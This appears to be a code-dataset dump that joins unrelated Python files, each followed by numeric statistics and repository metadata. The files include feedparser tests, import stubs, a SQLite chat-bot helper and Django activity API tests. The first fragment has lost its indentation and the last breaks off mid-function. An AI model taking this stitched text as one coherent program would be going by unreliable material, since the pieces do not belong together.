feed = views.create_feed_from_url("http://abc.com")
self.assertEquals("A Test Feed", feed.name)
def test_with_temp_redirect(self):
test_feed = feedparser.FeedParserDict()
test_feed['bozo'] = False
test_feed['status'] = 302
test_feed['channel'] = feedparser.FeedParserDict()
test_feed['channel']['title'] = "A Test Feed"
test_feed['entries'] = []
test_feed['href'] = 'http://def.com'
feedparser.parse = lambda url: test_feed
feed = views.create_feed_from_url("http://abc.com")
self.assertEquals("A Test Feed", feed.name)
self.assertEquals('http://abc.com', feed.url)
def test_with_permanent_redirect(self):
test_feed = feedparser.FeedParserDict()
test_feed['bozo'] = False
test_feed['status'] = 301
test_feed['channel'] = feedparser.FeedParserDict()
test_feed['channel']['title'] = "A Test Feed"
test_feed['entries'] = []
test_feed['href'] = 'http://def.com'
feedparser.parse = lambda url: test_feed
feed = views.create_feed_from_url("http://abc.com")
self.assertEquals("A Test Feed", feed.name)
self.assertEquals('http://def.com', feed.url)
    def tearDown(self):
        feedparser.parse = self.orig_parse_func
| 34.446429 | 78 | 0.640228 | 225 | 1,929 | 5.275556 | 0.204444 | 0.20219 | 0.141533 | 0.161752 | 0.702612 | 0.702612 | 0.702612 | 0.702612 | 0.662174 | 0.662174 | 0 | 0.006032 | 0.226542 | 1,929 | 55 | 79 | 35.072727 | 0.789544 | 0 | 0 | 0.581395 | 0 | 0 | 0.152411 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 1 | 0.116279 | false | 0 | 0.069767 | 0 | 0.209302 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c96bc4b63c9521207dd79bcee2abe73c969345dd | 381 | py | Python | metrics/plugins/__init__.py | matthewj8489/Starcraft2Metrics | 5156434bc22d25cc005c83e22ac4b3423ee40355 | [
"MIT"
] | 4 | 2019-10-06T01:16:36.000Z | 2020-12-23T21:01:55.000Z | metrics/plugins/__init__.py | matthewj8489/Starcraft2Metrics | 5156434bc22d25cc005c83e22ac4b3423ee40355 | [
"MIT"
] | 3 | 2019-03-09T17:26:43.000Z | 2020-04-12T18:19:35.000Z | metrics/plugins/__init__.py | matthewj8489/Starcraft2Metrics | 5156434bc22d25cc005c83e22ac4b3423ee40355 | [
"MIT"
] | null | null | null | from metrics.plugins.time_conversion import TimeConverter
from metrics.plugins.supply import SupplyTracker
from metrics.plugins.bases_created import BasesCreatedTracker
#from metrics.plugins.supply_created import SupplyCreatedTracker
from metrics.plugins.resources import ResourceTracker
from metrics.plugins.apm import APMTracker
from metrics.plugins.spm import SPMTracker
| 47.625 | 65 | 0.868766 | 45 | 381 | 7.288889 | 0.422222 | 0.234756 | 0.384146 | 0.146341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091864 | 381 | 7 | 66 | 54.428571 | 0.947977 | 0.165354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c97702212ddef73f3bd773aefe6b0438bb8f0858 | 190 | py | Python | pricelist/admin.py | WillieIlus/jobscorner | ed3734468ea0e88a306a1d29bc876562e940f4fb | [
"bzip2-1.0.6"
] | 2 | 2020-04-12T13:18:35.000Z | 2021-04-02T04:18:17.000Z | pricelist/admin.py | WillieIlus/jobscorner | ed3734468ea0e88a306a1d29bc876562e940f4fb | [
"bzip2-1.0.6"
] | 3 | 2020-02-11T23:58:53.000Z | 2020-09-06T18:46:17.000Z | pricelist/admin.py | WillieIlus/jobscorner | ed3734468ea0e88a306a1d29bc876562e940f4fb | [
"bzip2-1.0.6"
] | 1 | 2020-08-17T08:29:41.000Z | 2020-08-17T08:29:41.000Z | from django.contrib import admin
from .models import Type, Item, Service, Price
admin.site.register(Type)
admin.site.register(Item)
admin.site.register(Service)
admin.site.register(Price)
| 21.111111 | 46 | 0.8 | 28 | 190 | 5.428571 | 0.428571 | 0.236842 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089474 | 190 | 8 | 47 | 23.75 | 0.878613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
a38199d7834cb53203fdde94622082befbfa53c0 | 68 | py | Python | visigoth/common/event_handler/__init__.py | visigoths/visigoth | c5297148209d630f6668f0e5ba3039a8856d8320 | [
"MIT"
] | null | null | null | visigoth/common/event_handler/__init__.py | visigoths/visigoth | c5297148209d630f6668f0e5ba3039a8856d8320 | [
"MIT"
] | 1 | 2021-01-26T16:55:48.000Z | 2021-09-03T15:29:14.000Z | visigoth/common/event_handler/__init__.py | visigoths/visigoth | c5297148209d630f6668f0e5ba3039a8856d8320 | [
"MIT"
] | null | null | null | from visigoth.common.event_handler.event_handler import EventHandler | 68 | 68 | 0.911765 | 9 | 68 | 6.666667 | 0.777778 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044118 | 68 | 1 | 68 | 68 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e662e2c475277827607f32c1f1d39aba3ac3072 | 202 | py | Python | observations/tests.py | dbca-wa/penguins | 9e107d071cd38d9d05a673a52061753cae458d83 | [
"Apache-2.0"
] | null | null | null | observations/tests.py | dbca-wa/penguins | 9e107d071cd38d9d05a673a52061753cae458d83 | [
"Apache-2.0"
] | 8 | 2021-03-31T20:09:47.000Z | 2022-03-29T22:03:38.000Z | observations/tests.py | dbca-wa/penguins | 9e107d071cd38d9d05a673a52061753cae458d83 | [
"Apache-2.0"
] | 3 | 2019-01-14T04:53:40.000Z | 2019-01-22T01:46:31.000Z | from django.test import TestCase
class CivilTwilightTests(TestCase):
def test_civil_twilight_different_days(self):
pass
def test_civil_twilight_different_locations(self):
pass
| 22.444444 | 54 | 0.762376 | 24 | 202 | 6.083333 | 0.625 | 0.09589 | 0.164384 | 0.273973 | 0.39726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188119 | 202 | 8 | 55 | 25.25 | 0.890244 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0.166667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
6e8c2fdcd513e6bc8d97f0b5be5c6775769b9873 | 45 | py | Python | tempodb/protocol/__init__.py | tempodb/tempodb-python | 8ce45231bd728c6c97ef799cf0f1513ea3a9a7d3 | [
"MIT"
] | 4 | 2015-02-04T14:05:37.000Z | 2018-03-01T09:46:34.000Z | tempodb/protocol/__init__.py | tempodb/tempodb-python | 8ce45231bd728c6c97ef799cf0f1513ea3a9a7d3 | [
"MIT"
] | 2 | 2022-01-30T22:45:34.000Z | 2022-01-30T22:45:42.000Z | tempodb/protocol/__init__.py | tempodb/tempodb-python | 8ce45231bd728c6c97ef799cf0f1513ea3a9a7d3 | [
"MIT"
] | 1 | 2018-04-16T13:55:50.000Z | 2018-04-16T13:55:50.000Z | from protocol import *
from objects import *
| 15 | 22 | 0.777778 | 6 | 45 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 23 | 22.5 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e8cf6cb5e4a6de1abe96074b57f87cd28ea59cc | 49 | py | Python | python/testData/inspections/PyUnresolvedReferencesInspection/ReturnedQualifiedReferenceUnionType/b.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/inspections/PyUnresolvedReferencesInspection/ReturnedQualifiedReferenceUnionType/b.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/inspections/PyUnresolvedReferencesInspection/ReturnedQualifiedReferenceUnionType/b.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def f():
return 1
def g():
return 'foo'
| 8.166667 | 16 | 0.489796 | 8 | 49 | 3 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.346939 | 49 | 5 | 17 | 9.8 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0.061224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
6eb17c5eb0c868654a2dfa71527e052b2a5ea225 | 39 | py | Python | pipHelloWorld/__init__.py | MartinBCN/pipHelloWorld | 64c8dc873d064a32c1178749ed2a84f468abf5a0 | [
"MIT"
] | null | null | null | pipHelloWorld/__init__.py | MartinBCN/pipHelloWorld | 64c8dc873d064a32c1178749ed2a84f468abf5a0 | [
"MIT"
] | null | null | null | pipHelloWorld/__init__.py | MartinBCN/pipHelloWorld | 64c8dc873d064a32c1178749ed2a84f468abf5a0 | [
"MIT"
] | null | null | null | from pipHelloWorld.class1 import Class1 | 39 | 39 | 0.897436 | 5 | 39 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.076923 | 39 | 1 | 39 | 39 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6ec5b217e399656ea7ed4cc62ddd0aad2a702f1d | 38 | py | Python | __init__.py | thiagopyy/brainlypy | c77d69e0b57661fb1b2d83d4839e4473f9f7287e | [
"MIT"
] | 2 | 2021-11-07T13:48:58.000Z | 2021-12-24T23:56:50.000Z | __init__.py | thiagopyy/brainlypy | c77d69e0b57661fb1b2d83d4839e4473f9f7287e | [
"MIT"
] | null | null | null | __init__.py | thiagopyy/brainlypy | c77d69e0b57661fb1b2d83d4839e4473f9f7287e | [
"MIT"
] | 1 | 2022-03-11T21:50:44.000Z | 2022-03-11T21:50:44.000Z | from .brainly import search, set_lang
| 19 | 37 | 0.815789 | 6 | 38 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131579 | 38 | 1 | 38 | 38 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
42f7c33c7483e0d66e7137a067b47e1f40c85422 | 1,116 | py | Python | PDSUtilities/plotly/__init__.py | DrJohnWagner/PDSUtilities | ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13 | [
"Apache-2.0"
] | null | null | null | PDSUtilities/plotly/__init__.py | DrJohnWagner/PDSUtilities | ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13 | [
"Apache-2.0"
] | 12 | 2022-01-18T06:21:03.000Z | 2022-01-20T07:29:56.000Z | PDSUtilities/plotly/__init__.py | DrJohnWagner/PDSUtilities | ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13 | [
"Apache-2.0"
] | null | null | null | from PDSUtilities.plotly.ColorblindSafeColormaps import ColorblindSafeColormaps
from PDSUtilities.plotly.utilities import apply_default
from PDSUtilities.plotly.utilities import get_font
from PDSUtilities.plotly.utilities import get_shape
from PDSUtilities.plotly.utilities import get_line
from PDSUtilities.plotly.utilities import get_arrow
from PDSUtilities.plotly.utilities import get_label
from PDSUtilities.plotly.utilities import get_marker
from PDSUtilities.plotly.utilities import update_layout
from PDSUtilities.plotly.utilities import hex_to_rgb
from PDSUtilities.plotly.utilities import rgb_to_hex
from PDSUtilities.plotly.utilities import get_colors
from PDSUtilities.plotly.utilities import update_width_and_height
from PDSUtilities.plotly.utilities import update_title
from PDSUtilities.plotly.utilities import remove_ticks_and_tick_labels
from PDSUtilities.plotly.utilities import get_rows_and_cols
from PDSUtilities.plotly.create_image_subplots import create_image_subplots
from PDSUtilities.plotly.get_specs_from_mosaic import get_specs_from_mosaic
import PDSUtilities.plotly.templates as templates
| 55.8 | 79 | 0.897849 | 148 | 1,116 | 6.540541 | 0.256757 | 0.353306 | 0.409091 | 0.480372 | 0.666322 | 0.463843 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0681 | 1,116 | 19 | 80 | 58.736842 | 0.930769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
# File: opencv/sources/platforms/winpack_dldt/2020.1/patch.config.py (repo: vrushank-agrawal/opencv-x64-cmake, license: Apache-2.0)
applyPatch('20200313-ngraph-disable-tests-examples.patch', 'ngraph')
applyPatch('20200313-dldt-disable-unused-targets.patch')
applyPatch('20200313-dldt-fix-binaries-location.patch')
applyPatch('20200318-dldt-pdb.patch')
applyPatch('20200319-dldt-fix-msvs2019-v16.5.0.patch')
# File: Chapter03/B06246_03_12-reproj.py (repo: mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition, license: MIT)
# Reprojecting a Vector Layer
# https://github.com/GeospatialPython/Learn/raw/master/MSCities_MSTM.zip
import processing
processing.runalg("qgis:reprojectlayer", "/qgis_data/ms/MSCities_MSTM.shp", "epsg:4326", "/qgis_data/ms/MSCities_MSTM_4326.shp")
# File: texts/__init__.py (repo: PavelFryblik/DeepLearningStreamlit, license: MIT)
from texts import czechtext
# File: main.py (repo: JBizarri/concurrent-computing, license: MIT)
from app.app import create_app_local
if __name__ == "__main__":
    create_app_local()
# File: test_pytrain/test_GaussianNaiveBayes/__init__.py (repo: pytrain/pytrain-shallow, license: MIT)
from test_GaussianNaiveBayes import *
# File: sql_worker.py (repo: Allnorm/Polyglot, license: MIT)
import logging
import sqlite3
import time
import traceback
dbname = "chatlist.db"
class SQLWriteError(Exception):
pass
def table_init():
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute('''CREATE TABLE if not exists chats (
chat_id TEXT NOT NULL PRIMARY KEY,
lang TEXT NOT NULL,
is_locked TEXT,
premium TEXT NOT NULL,
expire_time INTEGER,
user_id TEXT,
target_lang TEXT);''')
cursor.execute('''CREATE TABLE if not exists tasks (
message_id TEXT NOT NULL,
body TEXT NOT NULL,
region TEXT NOT NULL,
expire_time INTEGER,
chat_id TEXT NOT NULL);''')
sqlite_connection.commit()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
def get_chat_info(chat_id, user_id=None):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
if user_id is not None:
cursor.execute("""SELECT * FROM chats WHERE user_id = ?""", (user_id,))
else:
cursor.execute("""SELECT * FROM chats WHERE chat_id = ?""", (chat_id,))
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
cursor.close()
sqlite_connection.close()
return record
def get_chat_list():
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM chats WHERE premium = 'no'""")
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
cursor.close()
sqlite_connection.close()
return record
def update_premium_list():
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM chats WHERE premium = 'yes'""")
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
if record:
for current_chat in record:
if current_chat[4] < time.time() and current_chat[4] != 0:
try:
write_chat_info(current_chat[0], "premium", "no")
write_chat_info(current_chat[0], "expire_time", "0")
except SQLWriteError:
break
cursor.close()
sqlite_connection.close()
def actualize_chat_premium(chat_id):
current_chat = get_chat_info(chat_id)
if not current_chat:
return
if current_chat[0][3] == "yes":
if current_chat[0][4] < time.time() and current_chat[0][4] != 0:
try:
write_chat_info(current_chat[0][0], "premium", "no")
write_chat_info(current_chat[0][0], "expire_time", "0")
except SQLWriteError:
return
def write_chat_info(chat_id, key, value):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM chats WHERE chat_id = ?""", (chat_id,))
record = cursor.fetchall()
if not record:
cursor.execute("""INSERT INTO chats VALUES (?,?,?,?,?,?,?);""",
(chat_id, "en", "no", "no", "0", "", "disable"))
cursor.execute("""UPDATE chats SET {} = ? WHERE chat_id = ?""".format(key), (value, chat_id))
sqlite_connection.commit()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
raise SQLWriteError
cursor.close()
sqlite_connection.close()
def write_task(message_id, body, region, expire_time, chat_id):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM tasks WHERE message_id = ? AND chat_id = ?""", (message_id, chat_id,))
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
if record:
return False
try:
cursor.execute("""INSERT INTO tasks VALUES (?,?,?,?,?);""", (message_id, body, region, expire_time, chat_id))
sqlite_connection.commit()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
raise SQLWriteError
cursor.close()
sqlite_connection.close()
def get_tasks(lang_code):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""SELECT * FROM tasks WHERE region = ?""", (lang_code,))
record = cursor.fetchall()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("read mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
record = []
cursor.close()
sqlite_connection.close()
return record
def rem_task(message_id, chat_id):
sqlite_connection = sqlite3.connect(dbname)
cursor = sqlite_connection.cursor()
try:
cursor.execute("""DELETE FROM tasks WHERE message_id = ? AND chat_id = ?""", (message_id, chat_id,))
sqlite_connection.commit()
cursor.close()
sqlite_connection.close()
except (sqlite3.OperationalError, sqlite3.DatabaseError) as e:
logging.error("write mySQL DB failed!")
logging.error(str(e) + "\n" + traceback.format_exc())
cursor.close()
sqlite_connection.close()
raise SQLWriteError
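# The helpers above all repeat the same connect/execute/close pattern. The
# following is a minimal standalone sketch of the insert-then-update flow used
# by write_chat_info, run against an in-memory database so it is self-contained;
# the schema is copied from table_init, and upsert_chat is an illustrative name,
# not part of this module.
#
# import sqlite3
#
# def upsert_chat(cursor, chat_id, key, value):
#     cursor.execute("SELECT 1 FROM chats WHERE chat_id = ?", (chat_id,))
#     if not cursor.fetchall():
#         # Insert a row of defaults first, mirroring write_chat_info.
#         cursor.execute(
#             "INSERT INTO chats VALUES (?,?,?,?,?,?,?)",
#             (chat_id, "en", "no", "no", "0", "", "disable"),
#         )
#     # `key` must be a trusted column name (see the note in write_chat_info).
#     cursor.execute(
#         "UPDATE chats SET {} = ? WHERE chat_id = ?".format(key), (value, chat_id)
#     )
#
# connection = sqlite3.connect(":memory:")
# cursor = connection.cursor()
# cursor.execute(
#     """CREATE TABLE chats (
#         chat_id TEXT NOT NULL PRIMARY KEY,
#         lang TEXT NOT NULL,
#         is_locked TEXT,
#         premium TEXT NOT NULL,
#         expire_time INTEGER,
#         user_id TEXT,
#         target_lang TEXT)"""
# )
# upsert_chat(cursor, "42", "lang", "de")
# cursor.execute("SELECT lang, premium FROM chats WHERE chat_id = ?", ("42",))
# print(cursor.fetchone())  # -> ('de', 'no')

```python
import sqlite3

# Sketch (assumption): the insert-then-update flow used by write_chat_info,
# shown against an in-memory database so it runs standalone. upsert_chat is
# an illustrative name, not part of sql_worker.py.

def upsert_chat(cursor, chat_id, key, value):
    cursor.execute("SELECT 1 FROM chats WHERE chat_id = ?", (chat_id,))
    if not cursor.fetchall():
        # Insert a row of defaults first, mirroring write_chat_info.
        cursor.execute(
            "INSERT INTO chats VALUES (?,?,?,?,?,?,?)",
            (chat_id, "en", "no", "no", "0", "", "disable"),
        )
    # `key` must be a trusted column name (see the note in write_chat_info).
    cursor.execute(
        "UPDATE chats SET {} = ? WHERE chat_id = ?".format(key), (value, chat_id)
    )

connection = sqlite3.connect(":memory:")
cursor = connection.cursor()
cursor.execute(
    """CREATE TABLE chats (
        chat_id TEXT NOT NULL PRIMARY KEY,
        lang TEXT NOT NULL,
        is_locked TEXT,
        premium TEXT NOT NULL,
        expire_time INTEGER,
        user_id TEXT,
        target_lang TEXT)"""
)
upsert_chat(cursor, "42", "lang", "de")
cursor.execute("SELECT lang, premium FROM chats WHERE chat_id = ?", ("42",))
print(cursor.fetchone())  # -> ('de', 'no')
```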
# File: pharaohCLI/__init__.py (repo: bentheiii/Pharaoh, license: MIT)
from pharaohCLI.run import main
# File: bluebottle/time_based/tests/test_api.py (repo: onepercentclub/bluebottle, license: BSD-3-Clause)
import json
import urllib
from datetime import timedelta, date
from io import BytesIO
import icalendar
from django.contrib.auth.models import Group, Permission
from django.contrib.gis.geos import Point
from django.urls import reverse
from django.utils.timezone import now, utc
from openpyxl import load_workbook
from rest_framework import status
from bluebottle.files.tests.factories import PrivateDocumentFactory
from bluebottle.initiatives.models import InitiativePlatformSettings
from bluebottle.initiatives.tests.factories import InitiativeFactory, InitiativePlatformSettingsFactory
from bluebottle.members.models import MemberPlatformSettings
from bluebottle.segments.tests.factories import SegmentTypeFactory, SegmentFactory
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.factory_models.geo import LocationFactory, PlaceFactory
from bluebottle.test.factory_models.projects import ThemeFactory
from bluebottle.test.utils import BluebottleTestCase, JSONAPITestClient, get_first_included_by_type
from bluebottle.time_based.models import SlotParticipant, Skill
from bluebottle.time_based.tests.factories import (
DateActivityFactory, PeriodActivityFactory,
DateParticipantFactory, PeriodParticipantFactory,
DateActivitySlotFactory, SlotParticipantFactory, SkillFactory
)
class TimeBasedListAPIViewTestCase():
def setUp(self):
super().setUp()
self.settings = InitiativePlatformSettingsFactory.create(
activity_types=[self.factory._meta.model.__name__.lower()]
)
self.client = JSONAPITestClient()
self.url = reverse('{}-list'.format(self.type))
self.user = BlueBottleUserFactory()
self.initiative = InitiativeFactory(owner=self.user)
self.initiative.states.submit(save=True)
self.data = {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'attributes': {
'title': 'Beach clean-up Katwijk',
'review': False,
'is-online': True,
'registration-deadline': str(date.today() + timedelta(days=14)),
'capacity': 10,
'description': 'We will clean up the beach south of Katwijk'
},
'relationships': {
'initiative': {
'data': {
'type': 'initiatives', 'id': self.initiative.id
},
},
}
}
}
def test_create_complete(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.response_data = response.json()['data']
self.assertEqual(self.response_data['attributes']['status'], 'draft')
self.assertEqual(self.response_data['attributes']['title'], self.data['data']['attributes']['title'])
self.assertEqual(
self.response_data['meta']['permissions']['GET'],
True
)
self.assertEqual(
self.response_data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
self.response_data['meta']['permissions']['PATCH'],
True
)
def test_create_duplicate_title(self):
DateActivityFactory.create(
title=self.data['data']['attributes']['title']
)
# Add an activity with the same title should NOT return an error
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_disabled(self):
self.settings.activity_types = ('funding',)
self.settings.save()
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_no_title(self):
del self.data['data']['attributes']['title']
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue(
'/data/attributes/title' in (
error['source']['pointer'] for error in response.json()['data']['meta']['required']
)
)
def test_create_as_activity_manager(self):
activity_manager = BlueBottleUserFactory.create()
self.initiative.activity_managers.add(activity_manager)
response = self.client.post(self.url, json.dumps(self.data), user=activity_manager)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_not_initiator(self):
another_user = BlueBottleUserFactory.create()
response = self.client.post(self.url, json.dumps(self.data), user=another_user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_not_initiator_open(self):
self.initiative.is_open = True
self.initiative.states.approve(save=True)
another_user = BlueBottleUserFactory.create()
response = self.client.post(self.url, json.dumps(self.data), user=another_user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_not_initiator_not_approved(self):
self.initiative.is_open = True
self.initiative.save()
another_user = BlueBottleUserFactory.create()
response = self.client.post(self.url, json.dumps(self.data), user=another_user)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class DateListAPIViewTestCase(TimeBasedListAPIViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
def setUp(self):
super().setUp()
self.slot_url = reverse('date-slot-list')
self.data['data']['attributes'].update({
'start': str(now() + timedelta(days=21)),
'duration': '4:00:00',
})
self.slot_data = {
'data': {
'type': 'activities/time-based/date-slots',
'attributes': {
'title': 'Kick-off',
'is-online': True,
'start': '2020-12-01T10:00:00+01:00',
'duration': '2:30:00',
'capacity': 10,
},
'relationships': {
'activity': {
'data': {
'type': 'activities/time-based/dates',
'id': 0
},
},
}
}
}
def test_create_complete(self):
super().test_create_complete()
# Can't yet submit because we don't have a slot yet
self.assertEqual(
{
transition['name'] for transition in
self.response_data['meta']['transitions']
},
{'delete'}
)
def test_add_slots_by_owner(self):
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
